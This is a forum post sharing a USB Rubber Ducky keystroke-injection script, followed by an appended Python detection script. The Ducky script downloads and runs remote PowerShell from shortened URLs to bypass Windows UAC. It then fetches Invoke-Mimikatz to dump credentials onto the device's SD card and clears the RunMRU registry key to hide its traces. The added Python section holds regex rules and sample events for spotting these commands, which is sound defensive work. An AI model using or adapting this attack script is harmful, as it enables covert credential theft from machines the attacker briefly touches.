Posts posted by linuxbman

  1. Hi all,

    I've been playing with the ducky for some time, figured it was time to give back to the community.  I've incorporated the new UAC Bypass exploit with the Invoke-Mimikatz payload to dump to my SD card on my ducky, as I have the twin Ducky firmware, with the mimikatz output named after the computer.  

    The only issue I am having is that when it does the UAC Bypass it does not recognize the exit after, so there is still a small window present.  I suspect it is because the exploit pops the new window up, and likely there is nothing I can do.  Hopefully someone can figure it out.

    Otherwise it works pretty nice.  Feel free to clean it up and make it better.

    REM open cmd and set drive letter
    DELAY 2000
    WINDOWS r
    DELAY 200
    STRING cmd.exe /T:01 /K mode CON: COLS=15 LINES=1
    ENTER
    DELAY 1000
    
    STRING powershell "IEX (New-Object Net.WebClient).DownloadString('https://goo.gl/fPl4tm');  Bypass-UAC -Method ucmDismMethod; exit;"
    ENTER
    DELAY 1000
    
    REM Shrink windows
    STRING mode CON: COLS=15 LINES=1
    ENTER
    
    REM get Ducky Drive letter
    STRING $drive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'DUCKY'}
    ENTER
    DELAY 500
    
    REM Run Mimikatz and dump to ducky in file named after computer
    STRING IEX (New-Object Net.WebClient).DownloadString('https://goo.gl/KBCGCr'); $Output = Invoke-Mimikatz -DumpCreds; $Output | Out-File ($drive.Name+$env:computername+".txt");
    ENTER
    DELAY 1000
    STRING Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue; exit
    ENTER
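For defenders, the command strings typed by the script above are distinctive enough to match in PowerShell script block logs (Event ID 4104) or process command-line auditing. The following is an added example, not part of the original post: the rule names, the severity tiers and the `(host, command)` input shape are assumptions, and the sample events are constructed.

```python
import re
from collections import defaultdict

# Indicators taken from the payload in the post above; rule names are hypothetical.
RULES = {
    "download_cradle": re.compile(r"IEX\s*\(\s*New-Object\s+Net\.WebClient\s*\)\.DownloadString\(", re.I),
    "uac_bypass_call": re.compile(r"\bBypass-UAC\b", re.I),
    "mimikatz_call": re.compile(r"\bInvoke-Mimikatz\b", re.I),
    "runmru_wipe": re.compile(r"Remove-ItemProperty\b.*\\Explorer\\RunMRU", re.I),
    "tiny_console": re.compile(r"mode\s+CON:?\s+COLS=\d{1,2}\s+LINES=1\b", re.I),
    "volume_label_lookup": re.compile(r"Win32_Volume\b.*\.Label\s+-eq", re.I),
}
HIGH = {"uac_bypass_call", "mimikatz_call", "runmru_wipe"}

def match_rules(command):
    """Return the sorted names of every rule that matches one command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(command))

def triage(events):
    """events: iterable of (host, command). Returns {host: (severity, hits)}."""
    per_host = defaultdict(set)
    for host, command in events:
        per_host[host].update(match_rules(command))
    report = {}
    for host, hits in per_host.items():
        if not hits:
            continue
        # A cradle alone is noisy; a cradle plus a high-signal rule is an alert.
        if "download_cradle" in hits and hits & HIGH:
            severity = "alert"
        elif hits & HIGH:
            severity = "review"
        else:
            severity = "info"
        report[host] = (severity, sorted(hits))
    return report

# Constructed sample events (host, command text), not real telemetry.
SAMPLE = [
    ("WS-01", "cmd.exe /T:01 /K mode CON: COLS=15 LINES=1"),
    ("WS-01", "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/a'); Invoke-Mimikatz -DumpCreds"),
    ("WS-01", "Remove-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU' -Name '*'"),
    ("WS-02", "Get-ChildItem C:\\Users"),
    ("WS-03", "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/setup.ps1')"),
]

if __name__ == "__main__":
    for host, (severity, hits) in sorted(triage(SAMPLE).items()):
        print(host, severity, hits)
```

Correlating per host matters because each command arrives as a separate keystroke-injected line, so no single event carries the whole chain.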
    
    

     
